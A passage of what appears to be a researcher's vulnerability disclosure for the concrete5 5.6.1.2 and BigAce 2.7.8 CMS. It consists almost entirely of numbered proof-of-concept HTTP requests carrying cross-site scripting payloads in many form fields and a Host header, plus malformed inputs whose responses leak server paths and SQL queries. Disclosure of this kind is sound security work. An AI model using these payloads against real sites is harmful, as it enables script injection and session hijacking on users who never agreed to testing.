GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search="><script>alert(22)</script>XXX&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
5. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir="><script>alert(1)</script>&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
6. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by="><script>alert(4)</script>&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
7. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector="><script>alert(5)</script>&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
8. information disclosure:
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults='%3e"%3e&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
resp:
Warning: Division by zero in /var/www/concrete5/concrete5.6.1.2/concrete/core/libraries/item_list.php on line 263
<div class="ccm-paging-top">Viewing <b>1</b> to <b><span id="pagingPageResults">0</span></b> (<b><span id="pagingTotalResults">54</span></b> Total)</div></div>
</div>
<div class="ccm-pane-footer">
9. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField="><script>alert(33)</script>"%3eXXX&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
10. information disclosure:
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 06:25:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 191
Connection: close
Content-Type: text/html
Fatal error: Call to a member function getAttributeType() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/core/controllers/single_pages/dashboard/files/search.php on line 134
11. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search="><script>alert(1111)</script>&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
12. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir="><script>alert(123)</script>&ccm_order_by=&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
13. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by="><script>alert(/1/)</script>XXX&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
14. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector="><script>alert(2)</script>&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
15. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/save_mobile_theme/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 94
MOBILE_THEME_ID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&save_mobile_theme=Save
---< request >---
16. XSS in SQL query error msg:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/types/add/do_add/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 187
ccm_token=1376290923%3Acf6fd358ef1afdfbf6d0206725a108b4&task=add&ctName=asdasdasd&ctHandle=asdasdasdasd&ctIcon='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&ccm-submit-add_page_type=Add
---< request >---
resp:
<div class="alert alert-error"><button type="button" class="close" data-dismiss="alert">×</button>
mysql error: [1062: Duplicate entry 'asdasdasdasd' for key 'ctHandle'] in EXECUTE("insert into PageTypes (ctHandle, ctName, ctIcon, ctIsInternal, pkgID) values ('asdasdasdasd', 'asdasdasd', '\'>\"><body onload=alert(/4321/)>', 0, 0)")
<br/>
</div>
17. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/users/attributes/edit/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 314
akID=10&akHandle=profile_private_messages_enabled&akName=%2f#%3csvg%2fonload%3dalert(4321)%3e&asID=0&akIsSearchableIndexed=1&akIsSearchable=1&atID=3&akCategoryID=2&ccm_token=1376290584%3A871b3d29741d11ea375c5803f202ce16&uakProfileEdit=1&uakRegisterEdit=1&akCheckedByDefault=1&ccm-submit-ccm-attribute-key-form=Save
---< request >---
18. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 971
input_theme_style_body-background_1='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
resp:
<input type="hidden" name="input_theme_style_body-background_1" id="input_theme_style_body-background_1" value="'>"><img/src="x"/onerror="alert(4321)">" />
<div class="ccm-theme-style-color " id="theme_style_body-background_1"><div hex-color="'>"><img/src="x"/onerror="alert(4321)">" style="background-color: '>"><img/src="x"/onerror="alert(4321)">"></div></div>
19. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
20. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 966
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
21. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
22. information disclosure:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/categories/block_type?ccm_token=1376291705:b56babf6af36363f211c7996e6986f60&task=save_permission&pkID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache
paID=60&blockTypesIncluded%5B1%5D=A
---< request >---
resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:15:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 359
Connection: close
Content-Type: text/html
Catchable fatal error: Argument 2 passed to Concrete5_Model_PermissionAccess::getByID() must be an instance of PermissionKey, null given, called in /var/www/concrete5/concrete5.6.1.2/concrete/tools/permissions/categories/block_type.php on line 23 and defined in /var/www/concrete5/concrete5.6.1.2/concrete/core/models/permission/access/model.php on line 206
23. information disclosure:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/categories/block_type?ccm_token=1376291705:b56babf6af36363f211c7996e6986f60&task=save_permission&pkID=16 HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache
paID="%20body%20onload%3d"alert(4321)"%3e&blockTypesIncluded%5B1%5D=A
---< request >---
resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:16:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 165
Connection: close
Content-Type: text/html
Fatal error: Call to a member function save() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/tools/permissions/categories/block_type.php on line 24
24. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1033
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%27%3e%22%3e%3c%69%6d%67%2f%73%72%63%3d%22%78%22%2f%6f%6e%65%72%72%6f%72%3d%22%61%6c%65%72%74%28%34%33%32%31%29%22%3e&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
25. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 966
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
26. xss
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
27. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 965
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
28. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 952
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1="%20body%20onload%3d"alert(4321)"%3e&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
29. information disclosure
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/access_entity HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache
task=save_permissions&accessType=10&peID=6&pdID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&pdStartDate_activate=on&pdStartDate_dt=8%2F12%2F2013&pdStartDate_h=9&pdStartDate_m=16&pdStartDate_a=AM&pdEndDate_activate=on&pdEndDate_dt=8%2F12%2F2013&pdEndDate_h=9&pdEndDate_m=16&pdEndDate_a=AM&pdRepeatPeriod=&pdRepeatPeriodDaysEvery=1&pdRepeatPeriodMonthsRepeatBy=month&pdRepeatPeriodMonthsEvery=1&pdRepeatPeriodWeeksDays%5B%5D=1&pdRepeatPeriodWeeksEvery=1&pdEndRepeatDate=
---< request >---
resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:19:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 172
Connection: close
Content-Type: text/html
Fatal error: Call to a member function setStartDateAllDay() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/core/models/permission/duration.php on line 205
30. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/basics/site_name/update_sitename/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 142
ccm_token=1376292237%3A47e17cc29a3b0e20cd35e618aebc20d8&SITE='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&ccm-submit-site-form=Save
---< request >---
31. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/seo/tracking_codes/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: application/x-www-form-urlencoded
Content-Length: 190
ccm_token=1376292246%3A18fb91291997356ac1a2f84e7edd3e07&tracking_code='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&tracking_code_position=bottom&ccm-submit-tracking-code-form=Save
---< request >---
32. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/seo/excluded/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 87
SEO_EXCLUDE_WORDS='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&ccm-submit-button=Save
---< request >---
33. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/mail/importers/save_importer/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 210
miID=1&miEmail='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&miIsEnabled=0&miServer=asd&miUsername=asd&miPassword=asd&miEncryption=&miPort=asd&miConnectionMethod=POP&ccm-submit-mail-importer-form=Save
---< request >---
Let me know if you have any questions.
Enjoy ;)
[EN] BigAce 2.7.8 Multiple bugs
Last week I saw that in latest version of BigAce CMS Yashar shahinzadeh found a vulnerability.
I decide to check it again, and I found few other things described below.
I. For normal registered ('anonymous') user:
1. Escaping from the source code via Host header:
---< request >---
GET /bigace/public/index.php?cmd=smarty&id=-1_len HTTP/1.1
Host: 1"%22%2f%3e%3cimg%2fsrc="x"%2fonerror="alert(2)">aaaaaaaaaaaaaa%3c%68%31%3e%61%73%64%3c%2f%68%31%3e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=t02veplpq601tanqc9ugm5sas1
Connection: close
---< request >---
Response:
<link rel="stylesheet" href="http://1"%22%2f%3e%3cimg%2fsrc="x"%2fonerror="alert(2)">aaaaaaaaa
aaaaa%3c%68%3 1%3e%61%73%64%3c%2f%68%31%3e/bigace/public/cid1/spring_flavour/style.css" type="text
II. For editor user logged-in:
1. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D='>"><script>alert(2)</script>&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D='%3e"%3e<script>alert(2)</script>&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
3. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D='%3e"%3e%3c<script>...&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
4. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
5. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
6. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
7. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
8. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
9. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
10. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcountry%5D=
---< request >---
11. xss
---< request >---
